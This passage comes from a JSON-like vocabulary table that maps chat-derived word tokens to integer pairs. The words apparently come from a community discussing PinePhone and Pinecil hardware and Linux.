[65535, 0], "lb": [65535, 0], "invited": [65535, 0], "anker": [65535, 0], "glowcil": [65535, 0], "resistive": [65535, 0], "bench": [65535, 0], "programmable": [65535, 0], "cycles": [65535, 0], "wired": [65535, 0], "earphones": [65535, 0], "nightly": [65535, 0], "bootsplash": [65535, 0], "everything's": [65535, 0], "chia": [65535, 0], "craze": [65535, 0], "arnoldderuiter": [65535, 0], "attempts": [30700, 34835], "desire": [65535, 0], "exploited": [65535, 0], "hating": [65535, 0], "lkml": [65535, 0], "patchwork": [65535, 0], "fry": [65535, 0], "kn": [65535, 0], "slipped": [65535, 0], "osint": [65535, 0], "queries": [65535, 0], "hurting": [65535, 0], "tha": [65535, 0], "mms": [65535, 0], "preserve": [65535, 0], "perfectionism": [65535, 0], "hits": [65535, 0], "spied": [65535, 0], "comunities": [65535, 0], "ivem": [65535, 0], "typos": [65535, 0], "migadu": [65535, 0], "transparent": [11832, 53703], "paint": [65535, 0], "ralsei": [65535, 0], "club": [65535, 0], "jlgbf": [65535, 0], "heap": [65535, 0], "enable": [65535, 0], "perspective": [65535, 0], "templeos": [65535, 0], "supplies": [65535, 0], "interacted": [65535, 0], "returns": [10166, 55369], "trusted": [20045, 45490], "pppee": [65535, 0], "eighteen": [65535, 0], "kirstraus": [65535, 0], "moscow": [65535, 0], "eximpost": [65535, 0], "transport": [65535, 0], "phh": [65535, 0], "gpl": [65535, 0], "overclocking": [65535, 0], "specify": [65535, 0], "neroburner": [65535, 0], "scriptable": [65535, 0], "treasure": [65535, 0], "trove": [65535, 0], "frig": [65535, 0], "geeking": [65535, 0], "underpowered": [65535, 0], "outlier": [65535, 0], "amongst": [65535, 0], "outliers": [65535, 0], "frozen": [65535, 0], "bathroom": [65535, 0], "otter": [65535, 0], "calc": [65535, 0], "megapixels": [65535, 0], "sony": [65535, 0], "xqaq": [65535, 0], "mhxdp": [65535, 0], "askzr": [65535, 0], "slice": [65535, 0], "rkdeveloptool": [65535, 0], "exceedingly": [65535, 0], "verbal": [65535, 0], "megapixel": [65535, 0], "opens": [65535, 0], "tcv": [65535, 0], "potato": [65535, 0], "peasy": [65535, 0], "lemon": [65535, 0], "squeezy": [65535, 0], "persuade": [65535, 0], "jed": [65535, 0], "ahdan": [65535, 0], "sshd": [65535, 0], "gnarly": [65535, 0], "qualcomm": [65535, 0], "qt": [65535, 0], "interpreter": [65535, 0], "mcmaster": [65535, 0], "carr": [65535, 0], "destined": [65535, 0], "waaaay": [65535, 0], "keypessses": [65535, 0], "imgbb": [65535, 0], "divided": [65535, 0], "length": [65535, 0], "arena": [65535, 0], "shooter": [65535, 0], "trustworthy": [6503, 59032], "retry": [65535, 0], "afterwards": [65535, 0], "touching": [65535, 0], "unmodified": [65535, 0], "mot": [65535, 0], "exceptions": [65535, 0], "var": [65535, 0], "tryed": [65535, 0], "generous": [20045, 45490], "factors": [65535, 0], "pll": [65535, 0], "freq": [65535, 0], "dcimic": [65535, 0], "interactive": [65535, 0], "uatw": [65535, 0], "tq": [65535, 0], "reboit": [65535, 0], "permanently": [65535, 0], "handled": [65535, 0], "njz": [65535, 0], "wrya": [65535, 0], "kali": [65535, 0], "nethunter": [65535, 0], "apprenticeship": [65535, 0], "cancer": [65535, 0], "comfort": [26080, 39455], "ncdu": [65535, 0], "telemetry": [65535, 0], "texting": [65535, 0], "whales": [65535, 0], "pinecils": [65535, 0], "welding": [65535, 0], "underwater": [65535, 0], "where's": [65535, 0], "flashlight": [65535, 0], "adorable": [11832, 53703], "killed": [65535, 0], "victim": [30700, 34835], "headaches": [65535, 0], "mainstream": [65535, 0], "theorised": [65535, 0], "illnesses": [65535, 0], "strong": [65535, 0], "jeweler's": [65535, 0], "glass": [65535, 0], "macro": [65535, 0], "combination": [65535, 0], "rusted": [65535, 0], "eternity": [65535, 0], "washing": [65535, 0], "soap": [65535, 0], "frostbite": [65535, 0], "legacy": [65535, 0], "mistakes": [65535, 0], "grudges": [65535, 0], "downloadmoreram": [65535, 0], "someday": [65535, 0], "stripe": [65535, 0], "ssd's": [65535, 0], "psh": [65535, 0], "letters": [65535, 0], "mines": [65535, 0], "coins": [4484, 61051], "occasion": [11832, 53703], "tubblog": [65535, 0], "guides": [65535, 0], "floppydisk": [65535, 0], "promo": [6503, 59032], "disks": [65535, 0], "analog": [65535, 0], "thougj": [65535, 0], "luma": [65535, 0], "chroma": [65535, 0], "om": [17081, 48454], "nom": [65535, 0], "reinforcing": [65535, 0], "ribs": [65535, 0], "bowing": [65535, 0], "pressure": [65535, 0], "carefully": [65535, 0], "emulate": [65535, 0], "ds": [65535, 0], "occasionally": [65535, 0], "deviantart": [65535, 0], "ecrief": [65535, 0], "pika": [65535, 0], "poo": [65535, 0], "during": [20045, 45490], "unhandled": [65535, 0], "necessity": [20045, 45490], "memcpy": [65535, 0], "dram": [65535, 0], "ts": [65535, 0], "miniware": [65535, 0], "santa": [65535, 0], "erase": [65535, 0], "psus": [65535, 0], "ce": [41813, 23722], "magnet": [65535, 0], "oriented": [14881, 50654], "smauels": [65535, 0], "defconfig": [65535, 0], "overhead": [65535, 0], "articulating": [65535, 0], "mirrorless": [65535, 0], "photography": [65535, 0], "zcw": [65535, 0], "slots": [30700, 34835], "ralim": [65535, 0], "collapse": [65535, 0], "colder": [65535, 0], "effectivly": [65535, 0], "forces": [65535, 0], "technology": [65535, 0], "mockery": [65535, 0], "hci": [65535, 0], "cfg": [65535, 0], "sz": [20045, 45490], "crust": [65535, 0], "limitation": [65535, 0], "lxd": [65535, 0], "secure": [30700, 34835], "tbepc": [65535, 0], "trustedfirmware": [65535, 0], "mailbox": [65535, 0], "trolley": [65535, 0], "props": [65535, 0], "jzlhthg": [65535, 0], "dropping": [65535, 0], "thousands": [65535, 0], "dungeons": [65535, 0], "dragons": [65535, 0], "tactics": [65535, 0], "sunlight": [65535, 0], "glitters": [65535, 0], "userbase": [65535, 0], "krfb": [65535, 0], "psuedo": [65535, 0], "dpad": [65535, 0], "bottles": [65535, 0], "nearby": [65535, 0], "unverifed": [65535, 0], "divides": [65535, 0], "nusacat": [65535, 0], "mutiplying": [65535, 0], "ttyusb": [65535, 0], "jessicainthekitchen": [65535, 0], "vegan": [65535, 0], "waffles": [65535, 0], "dreamcast": [65535, 0], "satarn": [65535, 0], "sgi": [65535, 0], "mac": [65535, 0], "motocross": [65535, 0], "madness": [65535, 0], "ttijfii": [65535, 0], "sfc": [65535, 0], "hxmrrjfukr": [65535, 0], "upgraded": [65535, 0], "haphazardly": [65535, 0], "unsupported": [65535, 0], "manner": [65535, 0], "otg": [65535, 0], "chair": [65535, 0], "lift": [65535, 0], "role": [65535, 0], "vobek": [65535, 0], "lbp": [65535, 0], "incident": [65535, 0], "bricks": [65535, 0], "lazy": [65535, 0], "claim": [65535, 0], "herrie": [65535, 0], "mini": [65535, 0], "keys": [65535, 0], "guzzle": [65535, 0], "unbreakable": [65535, 0], "tritan": [65535, 0], "cjltcqr": [65535, 0], "psdc": [65535, 0], "ybyyj": [65535, 0], "daughter": [6503, 59032], "qi": [65535, 0], "disc": [65535, 0], "yvbwkt": [65535, 0], "techspray": [65535, 0], "electronic": [65535, 0], "japan": [65535, 0], "cautious": [65535, 0], "videomode": [65535, 0], "modeline": [65535, 0], "occultist": [65535, 0], "orientation": [65535, 0], "netcat": [65535, 0], "nyancat": [65535, 0], "axncioal": [65535, 0], "losing": [65535, 0], "literacy": [65535, 0], "wg": [65535, 0], "conductors": [65535, 0], "unbroken": [65535, 0], "glow": [65535, 0], "icy": [65535, 0], "futuristic": [65535, 0], "naah": [65535, 0], "template": [65535, 0], "itdoesn't": [65535, 0], "correlate": [65535, 0], "temperaturee": [65535, 0], "hakko": [65535, 0], "fzpgdla": [65535, 0], "crid": [65535, 0], "tfe": [65535, 0], "kaw": [65535, 0], "sprefix": [65535, 0], "caps": [65535, 0], "effect'd": [65535, 0], "lo": [14881, 50654], "hecho": [65535, 0], "vale": [65535, 0], "alguna": [65535, 0], "otra": [20045, 45490], "forma": [65535, 0], "activar": [65535, 0], "maskroom": [65535, 0], "inclined": [65535, 0], "shady": [65535, 0], "exta": [65535, 0], "perks": [65535, 0], "opinionated": [65535, 0], "configs": [65535, 0], "ironic": [65535, 0], "dismantle": [65535, 0], "hee's": [65535, 0], "contrast": [65535, 0], "moar": [65535, 0], "shadows": [65535, 0], "whale": [65535, 0], "srs": [65535, 0], "explode": [65535, 0], "pig": [65535, 0], "carcasses": [65535, 0], "hose": [65535, 0], "mans": [65535, 0], "corded": [65535, 0], "jetpack": [65535, 0], "activities": [65535, 0], "ahead": [65535, 0], "frnkencil": [65535, 0], "sciencil": [65535, 0], "teeth": [65535, 0], "bowl": [65535, 0], "seated": [65535, 0], "somefoo": [65535, 0], "mo": [65535, 0], "gbe": [65535, 0], "datacenter": [65535, 0], "pushing": [65535, 0], "unused": [65535, 0], "minimal": [65535, 0], "launch": [65535, 0], "revision": [65535, 0], "howdy": [65535, 0], "mastodon": [65535, 0], "minxwfqinpw": [65535, 0], "designer": [65535, 0], "calebs": [65535, 0], "sides": [65535, 0], "suspect": [65535, 0], "grain": [65535, 0], "grains": [65535, 0], "rubberband": [65535, 0], "henkel": [65535, 0], "german": [65535, 0], "owns": [65535, 0], "loctite": [65535, 0], "multicore": [65535, 0], "inverts": [65535, 0], "angle": [65535, 0], "enginerd": [65535, 0], "promoted": [65535, 0], "ptitseb": [65535, 0], "qma": [65535, 0], "document": [65535, 0], "behavior": [65535, 0], "yaaay": [65535, 0], "thoght": [65535, 0], "posible": [65535, 0], "ceo": [65535, 0], "complaint": [65535, 0], "slight": [65535, 0], "markup": [65535, 0], "xmonad": [65535, 0], "filament": [65535, 0], "shield": [65535, 0], "reflect": [65535, 0], "appliances": [65535, 0], "kitchen": [65535, 0], "seperate": [65535, 0], "ferrite": [65535, 0], "rod": [65535, 0], "antigravity": [65535, 0], "duh": [65535, 0], "buttons": [65535, 0], "yeep": [65535, 0], "fuckery": [65535, 0], "witnessing": [65535, 0], "joke": [65535, 0], "demagnetizer": [65535, 0], "nemydium": [65535, 0], "magnets": [65535, 0], "eye": [65535, 0], "intermittent": [65535, 0], "allegromicro": [65535, 0], "innovations": [65535, 0], "documents": [65535, 0], "publications": [65535, 0], "resuming": [65535, 0], "bed": [65535, 0], "su": [13704, 51831], "onjmlthfxku": [65535, 0], "jokes": [65535, 0], "migth": [65535, 0], "unwanted": [65535, 0], "sleeps": [65535, 0], "rare": [65535, 0], "chonky": [65535, 0], "sciencewave": [65535, 0], "piss": [65535, 0], "cook": [65535, 0], "vital": [65535, 0], "organs": [65535, 0], "experimental": [65535, 0], "dmr": [65535, 0], "comeback": [65535, 0], "silkscreen": [65535, 0], "valley": [65535, 0], "ranch": [65535, 0], "salad": [65535, 0], "dressing": [65535, 0], "fm": [65535, 0], "tranmitter": [65535, 0], "ir": [20045, 45490], "blaster": [65535, 0], "they'd": [65535, 0], "respecting": [65535, 0], "haassle": [65535, 0], "minidso": [65535, 0], "walk": [65535, 0], "snug": [65535, 0], "nyokx": [65535, 0], "shall": [65535, 0], "clearance": [65535, 0], "inspiration": [14881, 50654], "responses": [65535, 0], "nw": [65535, 0], "young": [65535, 0], "gloves": [65535, 0], "painphone": [65535, 0], "painbook": [65535, 0], "wade": [65535, 0], "addess": [65535, 0], "collegue": [65535, 0], "sles": [65535, 0], "cromebooks": [65535, 0], "successful": [1566, 63969], "xrandr": [65535, 0], "xcb": [65535, 0], "omgubuntu": [65535, 0], "fantastic": [65535, 0], "truncated": [65535, 0], "younglings": [65535, 0], "lut": [65535, 0], "triggering": [65535, 0], "refreshes": [65535, 0], "sourced": [65535, 0], "communit": [65535, 0], "advantages": [65535, 0], "dawned": [65535, 0], "tasking": [65535, 0], "danctarch": [65535, 0], "suffer": [65535, 0], "customized": [65535, 0], "liking": [65535, 0], "easiest": [20045, 45490], "antennas": [65535, 0], "beginners": [65535, 0], "progressed": [65535, 0], "migrating": [65535, 0], "usermod": [65535, 0], "md": [65535, 0], "newname": [65535, 0], "oldname": [65535, 0], "folder": [65535, 0], "pull": [65535, 0], "society": [65535, 0], "argue": [65535, 0], "compliant": [65535, 0], "feb": [26080, 39455], "nyqcxyjjk": [65535, 0], "systemctl": [65535, 0], "financially": [4484, 61051], "recover": [20045, 45490], "syyu": [65535, 0], "ing": [65535, 0], "johns": [65535, 0], "paired": [65535, 0], "pairing": [65535, 0], "intto": [65535, 0], "commend": [65535, 0], "samueldr": [65535, 0], "ylph": [65535, 0], "xz": [65535, 0], "ufzac": [65535, 0], "qadvy": [65535, 0], "lowercase": [65535, 0], "yooooo": [65535, 0], "fishyyyy": [65535, 0], "hqr": [65535, 0], "shots": [65535, 0], "monthly": [26080, 39455], "mineral": [65535, 0], "oil": [65535, 0], "chunk": [65535, 0], "quitting": [65535, 0], "assessment": [65535, 0], "third": [41813, 23722], "emptying": [65535, 0], "sacrifices": [65535, 0], "hubs": [65535, 0], "volts": [65535, 0], "aruond": [65535, 0], "ohms": [65535, 0], "difficulty": [65535, 0], "unscrews": [65535, 0], "retrieve": [65535, 0], "irq": [65535, 0], "suffers": [65535, 0], "crimpin'": [65535, 0], "crimps": [65535, 0], "crimpier": [65535, 0], "blessed": [5308, 60227], "nix": [65535, 0], "brightness": [65535, 0], "dispute": [65535, 0], "undocumented": [65535, 0], "kobe": [65535, 0], "chanal": [65535, 0], "compromise": [65535, 0], "officially": [65535, 0], "catalina": [65535, 0], "reproduced": [65535, 0], "pester": [65535, 0], "gmipay": [65535, 0], "paywall": [65535, 0], "gemini": [65535, 0], "oghiv": [65535, 0], "filipino": [65535, 0], "materials": [65535, 0], "oic": [65535, 0], "blue": [65535, 0], "ragreenburg": [65535, 0], "fused": [65535, 0], "sugguest": [65535, 0], "tomscii": [65535, 0], "sig": [65535, 0], "lucckkkk": [65535, 0], "freedompop": [65535, 0], "iccid": [65535, 0], "modus": [65535, 0], "malware": [65535, 0], "whatta": [65535, 0], "pogos": [65535, 0], "cdetect": [65535, 0], "mmsc": [65535, 0], "'mobilenet'": [65535, 0], "tmobile": [65535, 0], "irons": [65535, 0], "euros": [65535, 0], "jaw": [65535, 0], "infected": [65535, 0], "scams": [65535, 0], "spreadsheet": [65535, 0], "novembernut": [65535, 0], "ayaya": [65535, 0], "replied": [65535, 0], "remover": [65535, 0], "zzh": [65535, 0], "sketchy": [65535, 0], "crashed": [65535, 0], "joinchat": [346, 65189], "zvm": [65535, 0], "ou": [30700, 34835], "lmgu": [65535, 0], "ili": [65535, 0], "sin": [5308, 60227], "mucous": [65535, 0], "membranes": [65535, 0], "suggests": [65535, 0], "rosin": [65535, 0], "plugins": [65535, 0], "incredible": [11832, 53703], "customization": [65535, 0], "you'r": [65535, 0], "ewilling": [65535, 0], "unfinished": [65535, 0], "tbey": [65535, 0], "ubports": [65535, 0], "disapointed": [65535, 0], "'what": [65535, 0], "now'": [65535, 0], "buys": [65535, 0], "reopen": [65535, 0], "sized": [65535, 0], "cheapest": [65535, 0], "tnntwzwp": [65535, 0], "inmu": [65535, 0], "exceed": [65535, 0], "marking": [65535, 0], "uaan": [65535, 0], "xq": [65535, 0], "tvpo": [65535, 0], "hzju": [65535, 0], "bbc": [65535, 0], "mundo": [6503, 59032], "noticias": [65535, 0], "riber": [65535, 0], "diagnosis": [65535, 0], "submerge": [65535, 0], "lied": [65535, 0], "rainbow": [65535, 0], "freezing": [65535, 0], "rectangles": [65535, 0], "dma": [65535, 0], "mere": [65535, 0], "watts": [65535, 0], "soldered": [65535, 0], "limtek": [65535, 0], "whos'": [65535, 0], "ra": [20045, 45490], "pings": [65535, 0], "mute": [65535, 0], "unplug": [65535, 0], "replug": [65535, 0], "moonlight": [65535, 0], "bc": [27750, 37785], "hve": [65535, 0], "trash": [65535, 0], "desoldering": [65535, 0], "tweezers": [65535, 0], "hqhxb": [65535, 0], "horrible": [65535, 0], "gentle": [65535, 0], "partial": [65535, 0], "ski": [65535, 0], "bop": [65535, 0], "swapping": [65535, 0], "bytes": [65535, 0], "suggested": [65535, 0], "decompress": [65535, 0], "donation": [65535, 0], "fragile": [65535, 0], "misunderstand": [65535, 0], "they've": [65535, 0], "nicknamed": [65535, 0], "clonecils": [65535, 0], "funiest": [65535, 0], "deliveries": [65535, 0], "january": [65535, 0], "ugly": [65535, 0], "valentines": [65535, 0], "surprising": [20045, 45490], "yu": [65535, 0], "tenta": [65535, 0], "conclusion": [65535, 0], "amplification": [65535, 0], "welp": [65535, 0], "attaching": [20045, 45490], "giant": [65535, 0], "rivaled": [65535, 0], "caffeine": [65535, 0], "widget": [65535, 0], "shortcut": [65535, 0], "prybar": [65535, 0], "blade": [65535, 0], "neither": [65535, 0], "marvel": [65535, 0], "mcdonalds": [65535, 0], "ice": [65535, 0], "cream": [65535, 0], "makers": [65535, 0], "cold": [65535, 0], "lite": [65535, 0], "xl": [65535, 0], "footprints": [65535, 0], "nonsense": [65535, 0], "hacks": [65535, 0], "incinerate": [65535, 0], "unmuted": [65535, 0], "trng": [65535, 0], "iot": [65535, 0], "microwave": [65535, 0], "polyglot": [65535, 0], "handler": [65535, 0], "sfp": [65535, 0], "dac": [65535, 0], "february": [65535, 0], "supoort": [65535, 0], "cutecom": [65535, 0], "consoles": [65535, 0], "pwr": [65535, 0], "summary": [65535, 0], "kuret": [65535, 0], "shadow": [65535, 0], "realm": [65535, 0], "binomo": [1656, 63879], "sabi": [65535, 0], "linuxhelpask": [65535, 0], "bitch": [65535, 0], "worded": [65535, 0], "awkward": [65535, 0], "zetabeta": [65535, 0], "recommends": [65535, 0], "trimming": [65535, 0], "quest": [65535, 0], "vr": [65535, 0], "headset": [65535, 0], "whooping": [65535, 0], "surface": [65535, 0], "police": [65535, 0], "membership": [65535, 0], "ec": [37311, 28224], "afdc": [65535, 0], "gap": [65535, 0], "wiggle": [65535, 0], "calipers": [65535, 0], "gullible": [65535, 0], "clicks": [65535, 0], "goddamn": [65535, 0], "radiators": [65535, 0], "sounded": [65535, 0], "ignoring": [65535, 0], "letting": [34352, 31183], "clips": [65535, 0], "twitch": [65535, 0], "splendiddeafbasenjipeanutbutterjellytime": [65535, 0], "ilbqolegjx": [65535, 0], "keifz": [65535, 0], "cius": [65535, 0], "moments": [65535, 0], "arrives": [65535, 0], "crowdsupply": [65535, 0], "rt": [20045, 45490], "mangopi": [65535, 0], "nezha": [65535, 0], "mq": [20045, 45490], "endloos": [65535, 0], "loop": [65535, 0], "npw": [65535, 0], "'processing'": [65535, 0], "'awaiting": [65535, 0], "payment'": [65535, 0], "schugy": [65535, 0], "strengths": [65535, 0], "localization": [65535, 0], "qml": [65535, 0], "plasmaphonedialer": [65535, 0], "paused": [65535, 0], "responsible": [20045, 45490], "extent": [65535, 0], "ima": [65535, 0], "peace": [16279, 49256], "moc": [65535, 0], "miss": [34993, 30542], "ads": [20045, 45490], "alerts": [65535, 0], "aircraft": [65535, 0], "flies": [65535, 0], "tram": [14881, 50654], "zflasher": [65535, 0], "warranty": [65535, 0], "reversal": [65535, 0], "burden": [65535, 0], "flaw": [65535, 0], "existed": [65535, 0], "kilometers": [65535, 0], "warsaw": [65535, 0], "blame": [65535, 0], "swearing": [65535, 0], "cuss": [65535, 0], "hazard": [65535, 0], "fighting": [20045, 45490], "attack": [65535, 0], "volunteers": [65535, 0], "california": [65535, 0], "recommended": [47550, 17985], "ahha": [65535, 0], "elyashiv": [65535, 0], "hazan": [65535, 0], "figures": [65535, 0], "delivers": [65535, 0], "concerns": [65535, 0], "kept": [41813, 23722], "held": [30700, 34835], "volume": [65535, 0], "breath": [65535, 0], "disrespect": [65535, 0], "towards": [20045, 45490], "displayed": [65535, 0], "kexec": [65535, 0], "performing": [65535, 0], "due": [51053, 14482], "diligence": [8393, 57142], "period": [37311, 28224], "upset": [65535, 0], "acting": [65535, 0], "rude": [65535, 0], "volunteer": [65535, 0], "hostile": [65535, 0], "gfci": [65535, 0], "born": [65535, 0], "flatpak": [65535, 0], "jdminecraftlauncher": [65535, 0], "gomuks": [65535, 0], "patiently": [65535, 0], "nexdock": [65535, 0], "eventually": [20045, 45490], "boss": [11832, 53703], "webcord": [65535, 0], "vscode": [65535, 0], "h\u01b0\u01a1ng": [65535, 0], "tr\u00e0m": [65535, 0], "emotes": [65535, 0], "spicy": [65535, 0], "glued": [65535, 0], "og": [65535, 0], "updater": [65535, 0], "metro": [65535, 0], "summer": [65535, 0], "isotopes": [65535, 0], "marble": [65535, 0], "gyxbe": [65535, 0], "zbx": [65535, 0], "colora": [65535, 0], "verizon": [65535, 0], "scoop": [65535, 0], "tan": [30700, 34835], "lenovo": [65535, 0], "thinkserver": [65535, 0], "pivpn": [65535, 0], "safely": [20045, 45490], "remote": [65535, 0], "unintentionly": [65535, 0], "destroyed": [20045, 45490], "watches": [65535, 0], "management": [24254, 41281], "pamac": [65535, 0], "mobian's": [65535, 0], "becoming": [20045, 45490], "clockworkpi": [65535, 0], "ppce": [65535, 0], "thankfully": [65535, 0], "stored": [65535, 0], "regards": [11832, 53703], "getconf": [65535, 0], "pagesize": [65535, 0], "fintasticman": [65535, 0], "irqbalance": [65535, 0], "unproblematic": [65535, 0], "describes": [65535, 0], "newsletter": [65535, 0], "contacted": [20045, 45490], "binaries": [65535, 0], "cover": [65535, 0], "tutorial": [65535, 0], "disassembly": [65535, 0], "nowo": [65535, 0], "noow": [65535, 0], "pinetine": [65535, 0], "dementia": [65535, 0], "reveal": [65535, 0], "ier": [65535, 0], "rolled": [65535, 0], "theirs": [65535, 0], "silver": [65535, 0], "findings": [65535, 0], "like's": [65535, 0], "versions": [65535, 0], "pinbetabs": [65535, 0], "forever": [23277, 42258], "heyo": [65535, 0], "brian": [5002, 60533], "chan": [65535, 0], "provided": [20045, 45490], "prank": [65535, 0], "bro": [65535, 0], "frontend": [65535, 0], "identify": [65535, 0], "wonky": [65535, 0], "vaporwave": [65535, 0], "faces": [11832, 53703], "russian": [14881, 50654], "roulette": [65535, 0], "serious": [30700, 34835], "crime": [65535, 0], "rc": [65535, 0], "iscord": [65535, 0], "atrix": [65535, 0], "elegram": [65535, 0], "promise": [5308, 60227], "oss": [65535, 0], "aaa": [20045, 45490], "doin": [65535, 0], "shinkkamui": [65535, 0], "drill": [65535, 0], "sunset": [65535, 0], "calculate": [65535, 0], "misunderstanding": [65535, 0], "measures": [65535, 0], "mil": [65535, 0], "paypal": [65535, 0], "caliper": [65535, 0], "deltas": [65535, 0], "chungus": [65535, 0], "tall": [65535, 0], "towers": [65535, 0], "enables": [65535, 0], "forcecares": [65535, 0], "recalibrate": [65535, 0], "beta": [65535, 0], "feh": [65535, 0], "bulging": [65535, 0], "instantly": [20045, 45490], "shuts": [65535, 0], "overheating": [65535, 0], "qc": [65535, 0], "dial": [65535, 0], "temp": [65535, 0], "footsteps": [65535, 0], "puzzling": [65535, 0], "affect": [30700, 34835], "reportedly": [65535, 0], "central": [11832, 53703], "thankguys": [65535, 0], "thehardestpart": [65535, 0], "workingin": [65535, 0], "landscape": [65535, 0], "boy": [65535, 0], "suggestion": [65535, 0], "tolerances": [65535, 0], "vary": [65535, 0], "widely": [65535, 0], "win": [18610, 46925], "nightlies": [65535, 0], "davmail": [65535, 0], "proxying": [65535, 0], "imap": [65535, 0], "extended": [65535, 0], "demo'd": [65535, 0], "metronome": [65535, 0], "flutter": [65535, 0], "intensity": [65535, 0], "muscle": [65535, 0], "memories": [65535, 0], "spams": [65535, 0], "initial": [65535, 0], "raise": [65535, 0], "podcasts": [65535, 0], "cooking": [65535, 0], "'em": [65535, 0], "turning": [20045, 45490], "slick": [65535, 0], "initally": [65535, 0], "fidgety": [65535, 0], "risks": [20045, 45490], "exploding": [65535, 0], "somthing": [65535, 0], "fried": [65535, 0], "opencl": [65535, 0], "foremost": [65535, 0], "conquer": [65535, 0], "unblock": [65535, 0], "wen't": [65535, 0], "bwnz": [65535, 0], "broadcast": [65535, 0], "receiver": [65535, 0], "snap": [65535, 0], "circuts": [65535, 0], "rolblox": [65535, 0], "devinbooker": [65535, 0], "libreboot": [65535, 0], "gtx": [65535, 0], "quadro": [65535, 0], "negotiate": [65535, 0], "chamber": [65535, 0], "pulled": [30700, 34835], "loosen": [65535, 0], "suddenly": [65535, 0], "feeling": [65535, 0], "wobble": [65535, 0], "motion": [65535, 0], "sensitivity": [65535, 0], "glittery": [65535, 0], "pink": [65535, 0], "unicorns": [65535, 0], "rainbows": [65535, 0], "painted": [65535, 0], "btings": [65535, 0], "spelling": [65535, 0], "aussie": [65535, 0], "clone": [65535, 0], "sellers": [65535, 0], "resume": [65535, 0], "deviate": [65535, 0], "dive": [65535, 0], "flushed": [65535, 0], "blocklist": [65535, 0], "whoo": [65535, 0], "hop": [65535, 0], "realistically": [65535, 0], "absurdly": [65535, 0], "leet": [65535, 0], "haxxor": [65535, 0], "miner": [8393, 57142], "jtag": [65535, 0], "disabled": [65535, 0], "rce": [65535, 0], "somebody's": [65535, 0], "hotmail": [65535, 0], "eyesshaking": [65535, 0], "curiousity": [65535, 0], "everyrthing": [65535, 0], "sampled": [65535, 0], "ride": [65535, 0], "qkall": [65535, 0], "restart": [65535, 0], "hint": [65535, 0], "appeared": [65535, 0], "apreciated": [65535, 0], "networks": [65535, 0], "iw": [65535, 0], "waking": [65535, 0], "suspension": [65535, 0], "bypassing": [65535, 0], "leds": [65535, 0], "vibration": [65535, 0], "hearing": [11832, 53703], "awesomer": [65535, 0], "hadn't": [65535, 0], "botched": [65535, 0], "socket": [65535, 0], "dip": [37311, 28224], "switches": [65535, 0], "matters": [65535, 0], "baffled": [65535, 0], "complain": [65535, 0], "wasn": [65535, 0], "draining": [65535, 0], "anbernic": [65535, 0], "reproduce": [65535, 0], "damaged": [65535, 0], "manufacturing": [65535, 0], "skme": [65535, 0], "simulator": [65535, 0], "googlefoo": [65535, 0], "sioyek": [65535, 0], "ilyaigpetrov": [65535, 0], "concern": [65535, 0], "wrangle": [65535, 0], "powercycle": [65535, 0], "yielded": [11832, 53703], "carelessness": [65535, 0], "checkouts": [65535, 0], "pines": [65535, 0], "protective": [65535, 0], "atlauncher": [65535, 0], "weigh": [65535, 0], "overloaded": [65535, 0], "derp": [65535, 0], "oranges": [65535, 0], "lbs": [65535, 0], "gazzew": [65535, 0], "silent": [65535, 0], "quieter": [65535, 0], "mechanical": [65535, 0], "linear": [65535, 0], "btrfs": [65535, 0], "snapper": [65535, 0], "snapshot": [65535, 0], "rollback": [65535, 0], "fruits": [65535, 0], "alphabet's": [65535, 0], "intend": [20045, 45490], "ghost": [65535, 0], "ditch": [65535, 0], "consistentlu": [65535, 0], "squizzstk": [65535, 0], "txf": [65535, 0], "pbmdldbaxp": [65535, 0], "coowq": [65535, 0], "omfg": [65535, 0], "bt": [65535, 0], "pkg": [65535, 0], "syu": [65535, 0], "updateeee": [65535, 0], "arduino": [65535, 0], "pace": [65535, 0], "raiding": [65535, 0], "corner": [65535, 0], "changelog": [65535, 0], "tow": [65535, 0], "lurk": [65535, 0], "offer": [14881, 50654], "adventurers": [65535, 0], "unholy": [65535, 0], "skyrim": [65535, 0], "siting": [65535, 0], "falls": [65535, 0], "oneplus": [65535, 0], "arriving": [65535, 0], "submit": [65535, 0], "carrying": [20045, 45490], "sooo": [65535, 0], "accents": [65535, 0], "vietnamese": [65535, 0], "translation": [65535, 0], "latin": [65535, 0], "ngu": [65535, 0], "methinks": [65535, 0], "omit": [65535, 0], "roadblock": [65535, 0], "i'ma": [65535, 0], "doggie": [65535, 0], "gute": [30700, 34835], "nacht": [65535, 0], "bib": [65535, 0], "gnunet": [65535, 0], "gnu's": [65535, 0], "manufacture": [65535, 0], "excitement": [65535, 0], "amber": [65535, 0], "terminals": [65535, 0], "alias": [65535, 0], "shorter": [65535, 0], "five": [11832, 53703], "imported": [65535, 0], "minded": [20045, 45490], "knerd": [65535, 0], "att": [65535, 0], "routines": [65535, 0], "informations": [65535, 0], "lies": [65535, 0], "conspiracies": [65535, 0], "glxinfo": [65535, 0], "kid": [65535, 0], "couldnt": [65535, 0], "pinebtrfs": [65535, 0], "snaptest": [65535, 0], "experienced": [20045, 45490], "clementine": [65535, 0], "shorted": [65535, 0], "burger": [65535, 0], "fallen": [65535, 0], "loops": [65535, 0], "typo'd": [65535, 0], "kodi": [65535, 0], "sync": [65535, 0], "elementum": [65535, 0], "addon": [65535, 0], "breaker": [65535, 0], "slurry": [65535, 0], "specifics": [65535, 0], "shorty": [65535, 0], "ifixit": [65535, 0], "larger": [65535, 0], "quantity": [65535, 0], "nny": [65535, 0], "zr": [65535, 0], "sw": [65535, 0], "apan": [65535, 0], "glt": [65535, 0], "prht": [65535, 0], "jdy": [65535, 0], "rbwqrnd": [65535, 0], "insider": [65535, 0], "stalking": [65535, 0], "corporation": [65535, 0], "ethics": [65535, 0], "savy": [65535, 0], "midnight": [65535, 0], "everytime": [65535, 0], "botting": [65535, 0], "obtrusion": [65535, 0], "trq": [65535, 0], "clobbered": [65535, 0], "newlines": [65535, 0], "ortt": [65535, 0], "flail": [65535, 0], "plant": [20045, 45490], "wv": [20045, 45490], "chatting": [65535, 0], "relief": [65535, 0], "betting": [65535, 0], "venture": [65535, 0], "skynet": [65535, 0], "semester": [65535, 0], "purged": [65535, 0], "schedule": [65535, 0], "gotchaa": [65535, 0], "interferes": [65535, 0], "blinky": [65535, 0], "iofx": [65535, 0], "resist": [65535, 0], "pun": [65535, 0], "lettter": [65535, 0], "drones": [65535, 0], "intact": [65535, 0], "smerg": [65535, 0], "tweezer": [65535, 0], "ultra": [65535, 0], "whirl": [65535, 0], "mi": [4484, 61051], "powerbuds": [65535, 0], "wxm": [65535, 0], "mentality": [65535, 0], "refernced": [65535, 0], "nitrogen": [65535, 0], "leads": [65535, 0], "astroai": [65535, 0], 